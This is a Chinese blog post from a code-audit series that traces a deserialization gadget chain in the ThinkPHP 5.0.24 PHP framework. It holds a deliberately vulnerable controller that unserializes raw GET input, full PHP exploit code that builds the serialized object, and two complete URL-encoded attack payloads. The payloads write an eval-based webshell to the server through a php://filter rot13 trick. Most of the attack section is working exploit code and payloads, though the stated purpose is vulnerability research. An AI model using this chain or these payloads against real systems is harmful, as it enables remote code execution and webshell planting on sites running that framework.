ThinkPHP5.0.x 反序列化

最新推荐文章于 2024-08-12 20:46:58 发布
最新推荐文章于 2024-08-12 20:46:58 发布
阅读量1.3k 收藏 4
点赞数 2
分类专栏: # ThinkPHP代码审计 文章标签: thinkphp 代码审计 php 反序列化 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyj20010728/article/details/119793016
版权

ThinkPHP5.0.x 反序列化

漏洞环境

  • 漏洞测试环境:PHP5.6+ThinkPHP5.0.24
  • 漏洞测试代码 application/index/controller/Index.php
<?php
namespace app\index\controller;

class Index
{
    public function index()
    {
	    $Gyan = unserialize($_GET['d1no']);
    	var_dump($Gyan);
      return '<style type="text/css">*{ padding: 0; margin: 0; } .think_default_text{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333;font-size:18px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }</style><div style="padding: 24px 48px;"> <h1>:)</h1><p> ThinkPHP V5<br/><span style="font-size:30px">十年磨一剑 - 为API开发设计的高性能框架</span></p><span style="font-size:22px;">[ V5.0 版本由 <a href="http://www.qiniu.com" target="qiniu">七牛云</a> 独家赞助发布 ]</span></div><script type="text/javascript" src="https://tajs.qq.com/stats?sId=9347272" charset="UTF-8"></script><script type="text/javascript" src="https://e.topthink.com/Public/static/client.js"></script><think id="ad_bd568ce7058a1091"></think>';
    }
}

漏洞分析

  • 先全局搜索一下 __destruct 方法
  • 跟进 thinkphp/library/think/process/pipes/Windows.php 中的 __destruct 方法,发现其调用了 removeFiles 方法
  • 跟进 removeFiles 方法
  • 可以利用 file_exists 函数来触发任意类的 __toString 方法
  • 全局搜索一下 __toString 方法
  • 跟进 thinkphp/library/think/Model.php 中的 __toString 方法,发现其调用了 toJson 方法
  • 由于 toJson 方法的返回结果中先调用了 toArray 方法,toArray 方法中存在三个地方可以触发 __call 方法,利用 $value->getAttr($attr) 来触发
  • 走到 else 之后要继续往下走的话先要判断 $modelRelation,该变量的值来自 $this->$relation(),继而调用 Loader::parseName 方法,该方法需要传入变量 $name,继续往上回溯,由于 $this->append 是可控的,所以 $name 也是可控的,这里可以利用 Model 类中的 getError 方法
  • 接着判断一下 $value 的值,其调用 getRelationData 方法,传入 $modelRelation,且需要 Relation 类型,进入该方法后先进行 if 条件判断
$this->parent && !$modelRelation->isSelfRelation() && get_class($modelRelation->getModel()) == get_class($this->parent)
  • 跟进一下 isSelfRelation 方法和 getModel 方法,发现都是可控的
  • 由于可利用的 __call 方法选择的是 think\console\Output 类,所以前面的 $value 一定是 think\console\Output 类对象,所以 getRelationData 方法中的 $this->parent 肯定也是 think\console\Output 类对象
  • 这里的 get_class 方法要求 $modelRelation->getModel()$this->parent 为同类,也就是要求 $value->getAttr($attr) 中的 $value 和上面简单可控的 model 为同类,这样就控制了 $value->getAttr($attr) 中的 $value
  • 继续跟下去查看 $attr,其值回溯到 $bindAttr = $modelRelation->getBindAttr(); 中,跟进 thinkphp/library/think/model/relation/OneToOne.php 中,binAttr 是可控的,至此代码执行到 $item[$key] = $value ? $value->getAttr($attr) : null; 就能够执行 Output__call 魔术方法
  • 跟进 Outputblock 方法
  • 继续跟进 writelin 方法,发现调用 write 方法
  • 这里 $this->handle 可控,全局搜索 write 方法进一步利用,跟进 thinkphp/library/think/session/driver/Memcached.php
  • 继续搜索可用 set 方法,跟进 thinkphp/library/think/cache/driver/File.php,可以直接执行 file_put_contents 方法写入 shell$filename 可控且可以利用伪协议绕过死亡 exit
  • $data 值比较棘手,由于最后调用 set 方法中的参数来自先前调用的 write 方法只能为 true,且这里 $expire 只能为数值,这样文件内容就无法写 shell
  • 继续执行,跟进下方的 setTagItem 方法,会再执行一次 set 方法,且这里文件内容 $value 通过 $name 赋值(文件名),所以可以在文件名上做手脚,例如
php://filter/write=string.rot13/resource=./<?cuc cucvasb();?>
  • 这里参考osword师傅分析的 POP链构造图

EXP

  • 由于 windows对文件名有限制,会写入失败,所以该漏洞在 windows 环境下无法进行复现
<?php
namespace think\process\pipes;
use think\model\Pivot;
class Pipes{

}

class Windows extends Pipes{
    private $files = [];

    function __construct(){
        $this->files = [new Pivot()];
    }
}

namespace think\model;#Relation
use think\db\Query;
abstract class Relation{
    protected $selfRelation;
    protected $query;
    function __construct(){
        $this->selfRelation = false;
        $this->query = new Query();#class Query
    }
}

namespace think\model\relation;#OneToOne HasOne
use think\model\Relation;
abstract class OneToOne extends Relation{
    function __construct(){
        parent::__construct();
    }

}
class HasOne extends OneToOne{
    protected $bindAttr = [];
    function __construct(){
        parent::__construct();
        $this->bindAttr = ["no","123"];
    }
}

namespace think\console;#Output
use think\session\driver\Memcached;
class Output{
    private $handle = null;
    protected $styles = [];
    function __construct(){
        $this->handle = new Memcached();//目的调用其write()
        $this->styles = ['getAttr'];
    }
}

namespace think;#Model
use think\model\relation\HasOne;
use think\console\Output;
use think\db\Query;
abstract class Model{
    protected $append = [];
    protected $error;
    public $parent;#修改处
    protected $selfRelation;
    protected $query;
    protected $aaaaa;

    function __construct(){
        $this->parent = new Output();#Output对象,目的是调用__call()
        $this->append = ['getError'];
        $this->error = new HasOne();//Relation子类,且有getBindAttr()
        $this->selfRelation = false;//isSelfRelation()
        $this->query = new Query();

    }
}

namespace think\db;#Query
use think\console\Output;
class Query{
    protected $model;
    function __construct(){
        $this->model = new Output();
    }
}

namespace think\session\driver;#Memcached
use think\cache\driver\File;
class Memcached{
    protected $handler = null;
    function __construct(){
        $this->handler = new File();//目的调用File->set()
    }
}
namespace think\cache\driver;#File
class File{
    protected $options = [];
    protected $tag;
    function __construct(){
        $this->options = [
        'expire'        => 0,
        'cache_subdir'  => false,
        'prefix'        => '',
        'path'          => 'php://filter/write=string.rot13/resource=./<?cuc cucvasb();riny($_TRG[q1ab])?>',
        'data_compress' => false,
        ];
        $this->tag = true;
    }
}

namespace think\model;
use think\Model;
class Pivot extends Model{


}
use think\process\pipes\Windows;
echo urlencode(serialize(new Windows()));
  • 生成文件名规则
md5('tag_'.md5($this->tag))
即:
md5('tag_c4ca4238a0b923820dcc509a6f75849b')
=>3b58a9545013e88c7186db11bb158c44
=>
<?cuc cucvasb();riny($_TRG[pzq]);?> + 3b58a9545013e88c7186db11bb158c44
最终文件名:
<?cuc cucvasb();riny($_TRG[pzq]);?>3b58a9545013e88c7186db11bb158c44.php
  • 在漏洞利用时需注意目录读写权限,可先控制 options['path'] = './demo/',利用框架创建一个 755 文件夹(前提是具有权限),我们可以稍微修改下 payload 用于创建一个 0755 权限的目录(这里利用的是 think\cache\driver\File:getCacheKey() 中的 mkdir 函数),然后再往这个目录写文件
  • poc 创建 demo 目录
<?php
namespace think\process\pipes;
use think\model\Pivot;
class Pipes{

}

class Windows extends Pipes{
    private $files = [];

    function __construct(){
        $this->files = [new Pivot()];
    }
}

namespace think\model;#Relation
use think\db\Query;
abstract class Relation{
    protected $selfRelation;
    protected $query;
    function __construct(){
        $this->selfRelation = false;
        $this->query = new Query();#class Query
    }
}

namespace think\model\relation;#OneToOne HasOne
use think\model\Relation;
abstract class OneToOne extends Relation{
    function __construct(){
        parent::__construct();
    }

}
class HasOne extends OneToOne{
    protected $bindAttr = [];
    function __construct(){
        parent::__construct();
        $this->bindAttr = ["no","123"];
    }
}

namespace think\console;#Output
use think\session\driver\Memcached;
class Output{
    private $handle = null;
    protected $styles = [];
    function __construct(){
        $this->handle = new Memcached();//目的调用其write()
        $this->styles = ['getAttr'];
    }
}

namespace think;#Model
use think\model\relation\HasOne;
use think\console\Output;
use think\db\Query;
abstract class Model{
    protected $append = [];
    protected $error;
    public $parent;#修改处
    protected $selfRelation;
    protected $query;
    protected $aaaaa;

    function __construct(){
        $this->parent = new Output();#Output对象,目的是调用__call()
        $this->append = ['getError'];
        $this->error = new HasOne();//Relation子类,且有getBindAttr()
        $this->selfRelation = false;//isSelfRelation()
        $this->query = new Query();

    }
}

namespace think\db;#Query
use think\console\Output;
class Query{
    protected $model;
    function __construct(){
        $this->model = new Output();
    }
}

namespace think\session\driver;#Memcached
use think\cache\driver\File;
class Memcached{
    protected $handler = null;
    function __construct(){
        $this->handler = new File();//目的调用File->set()
    }
}
namespace think\cache\driver;#File
class File{
    protected $options = [];
    protected $tag;
    function __construct(){
        $this->options = [
        'expire'        => 0,
        'cache_subdir'  => false,
        'prefix'        => '',
        'path'          => './demo/',
        'data_compress' => false,
        ];
        $this->tag = true;
    }
}

namespace think\model;
use think\Model;
class Pivot extends Model{


}
use think\process\pipes\Windows;
echo urlencode(serialize(new Windows()));

漏洞复现

  • 先创建一个 demo 目录
[payload=](http://192.168.246.129/public/index.php?d1no=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A6%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A8%3A%22%00%2A%00error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00bindAttr%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A2%3A%22no%22%3Bi%3A1%3Bs%3A3%3A%22123%22%3B%7Ds%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A7%3A%22.%2Fdemo%2F%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7D%7Ds%3A6%3A%22parent%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A7%3A%22.%2Fdemo%2F%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7Ds%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A7%3A%22.%2Fdemo%2F%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7Ds%3A8%3A%22%00%2A%00aaaaa%22%3BN%3B%7D%7D%7D)
  • 往这个目录写文件
[payload](http://192.168.246.129/public/index.php?d1no=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A6%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A8%3A%22%00%2A%00error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00bindAttr%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A2%3A%22no%22%3Bi%3A1%3Bs%3A3%3A%22123%22%3B%7Ds%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A83%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.rot13%2Fresource%3D.%2Fdemo%2F%3C%3Fcuc+cucvasb%28%29%3Briny%28%24_TRG%5Bq1ab%5D%29%3F%3E%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7D%7Ds%3A6%3A%22parent%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A83%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.rot13%2Fresource%3D.%2Fdemo%2F%3C%3Fcuc+cucvasb%28%29%3Briny%28%24_TRG%5Bq1ab%5D%29%3F%3E%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7Ds%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A83%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.rot13%2Fresource%3D.%2Fdemo%2F%3C%3Fcuc+cucvasb%28%29%3Briny%28%24_TRG%5Bq1ab%5D%29%3F%3E%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7Ds%3A8%3A%22%00%2A%00aaaaa%22%3BN%3B%7D%7D%7D)
H3rmesk1t
关注
专栏目录
Thinkphp5.0.x_RCE复现&5.0.24反序列化大礼包
大博的博客
08-07 6607
环境部署 以TP5.0.22为例 + PHP 5.6.27-NTS + phpstorm2020.1 反序列化环境为:TP5.0.24 + PHP 5.6.27-NTS + phpstorm2020.1 漏洞成因 现在TP的RCE通常将其分成两类: Request类其中变量被覆盖导致RCE 路由控制不严谨导致可以调用任意类致使RCE 反序列化的应用(需要存在反序列化的地方) Request类其中变量被覆盖导致RCE 我们以这个POC为例,进行复现: 我们正常的代码逻辑已经简单的写在了前文,如有代码执行疑
thinkphp5.0反序列化链小记.pdf
04-22
### ThinkPHP 5.0 反序列化链分析与实战经验分享 #### 一、概述 在本篇文章中,我们将深入探讨ThinkPHP 5.0框架中的一个安全漏洞——反序列化链攻击,并通过实际案例来理解其原理及利用方法。ThinkPHP是一款流行的...
TP5.0.xRCE&5.0.24反序列化分析1
08-03
TP5.0.xRCE&5.0.24 反序列化分析 - 先知社区根据类的命名空间可以快速定位件位置,在 ThinkPHP5.0 的规范,命名空间其实对应了件的所在
ThinkPHP5.0.x 反序列化分析
ki10Moc的博客
07-29 880
垃圾文章不要看
thinkphp8反序列化分析
最新发布
2301_79724395的博客
08-12 883
摆了一个暑假,正好看见周会有人分析了tp反序列化,想起这条链子的发现者就是我尊敬的nivia,这不得好好分析一下,而且师傅也是分析了这个,所以有了这个文章。
ThinkPHP v6.0.x 反序列化
Lethe's Blog
04-27 3498
0x01 环境搭建 使用composer进行安装: composer create-project topthink/think=6.0.x-dev TPv6.0 cd TPv6.0 php think run 定义入口文件app\controller\Index.php: <?php namespace app\controller; use app\BaseController; ...
ThinkPHP反序列化漏洞
2303_77642110的博客
05-18 623
中,$value来源于filterValue中的&$value,而cookie方法中调用filterValue时,传入的参数为$data,所以最终value的值来源于data,而在cookie方法中data不可控,所以排除了,很多人这里没想明白,我们接下来看input方法中的调用,还是继续探究$filter的值来源。wakeup两个反序列化一定会触发的魔术方法,wakeup需要进行反序列化时调用,所以先不考虑,搜索destruct,一共四个结果,而能利用的只有Windows.php
代码审计: ThinkPHP V6.0.12LTS反序列化漏洞复现
m0_68483928的博客
07-28 3620
ThinkPHP 是一个流行的 PHP 框架,其 6.0.12 LTS 版本中曾经存在一个反序列化漏洞。这类漏洞可能会被恶意攻击者利用来执行任意代码,危害系统安全。下面我将对这个漏洞进行复现,如果有需要源代码的读者请私信我,或者我后续放置在我的免费资源上面
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
weixin_43822401的博客
06-16 813
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者通过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
ThinkPHP5.0手册.pdf
04-21
ThinkPHP5.0涵盖了模型初始化、查询事件、事务操作、监听SQL、存储过程、数据集定义、新增更新删除查询、聚合、获取器、修改器、时间戳、只读字段、软删除、类型转换、数据完成查询范围、模型分层、数组访问和转换、...
ThinkPHP5.0完全开发手册PDF版
02-25
- 数据完成查询范围、模型分层和数组到JSON的序列化。 - 多语言支持、分页处理、上传和验证码处理。 **安全和调试**: - 404页面、验证器的创建和使用,确保数据的正确性和安全性。 - 异常处理机制和调试信息的输出...
ThinkPHP5 中的反序列化利用链详细分析
程序员阿飘 的博客
01-17 506
作为一个Web菜鸡,我之前和师傅们参加了红帽杯,奈何只有0输出,当时只知道是thinkphp5.2的反序列化漏洞,但是感觉时间不够了,也就没有继续做下去。只有赛后来查漏补缺了,也借着tp5.2这个反序列化pop链来学习下大佬们的构造思路,不得不说这个pop链真的是很强了,在分析的过程中,妈妈一直问我为什么跪着玩电脑~
【详细分析】thinkphp反序列化漏洞
记录学习,一起进步
06-26 1480
【详细分析】thinkphp反序列化漏洞
thinkphp5.0.24反序列化
qq_62989306的博客
09-18 2120
此时我们需要寻找能写webshell的__call()方法,在这里选择的是think\console\Output类里的$method是getAttr,且$this->styles是可控的。只要在styles数组里加一个getAttr即可。所以可以顺利进入第一个if。array_unshift() 函数用于向数组插入新元素,新数组的值将被插入到数组的开头。里的参数都是可控的,所以往下走没有影响。call_user_func_array()是回调函数,可以将把一个数组参数作为回调函数的参数。
ThinkPHP 5.0.24反序列化分析
RestoreJustice的博客
04-12 1221
调试环境:phpstudy+phpstorm+xdebugphp版本:php7.3.4nts源码:Thinkphp5.0.24注意:源码下载地址:https://www.thinkphp.cn/donate/download/id/1279.html 三、构建利用点 控制器文件(Controller) ThinkPHP的控制器是一个类,接收用户的输入并调用模型和视图去完成用户的需求,控制器层由核心控制器和业务控制器组成,核心控制器由系统内部的App类完成,负责应用(包括模块、控制器和操作)的调度控制,包
ThinkPHP中__initialize()和类的构造函数__construct()用法分析
weixin_30363817的博客
11-27 141
本文实例分析了ThinkPHP中的__initialize()和类的构造函数__construct()。分享给大家供大家参考。具体分析如下: thinkphp中的__construct是不可以随便用的,因为你的模块类继承上级类,上级类有定义好的; 1、__initialize()不是php类中的函数,php类的构造函数只有__construct(). 2、类的初始化:子类如果有自己的构造函数...
全网最详细thinkPHP反序列化漏洞详解
kunkun_xiaomeng的博客
08-31 2004
thinkphp漏洞详解
PHP中序列化函数serialize($arr) 和反序列化函数unserialize($info)
不负好时光的博客
09-25 3028
序列化与反序列化 把复杂的数据类型压缩到一个字符串中 serialize() 把变量和它们的值编码成文本形式 unserialize() 恢复原先变量 1.创建一个$arr数组用于储存用户基本信息,并在浏览器中输出查看结果; 2.将$arr数组进行序列化赋值给$info字符串,并在浏览器中输出查看结果; 使用序列化serialize($arr)函
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值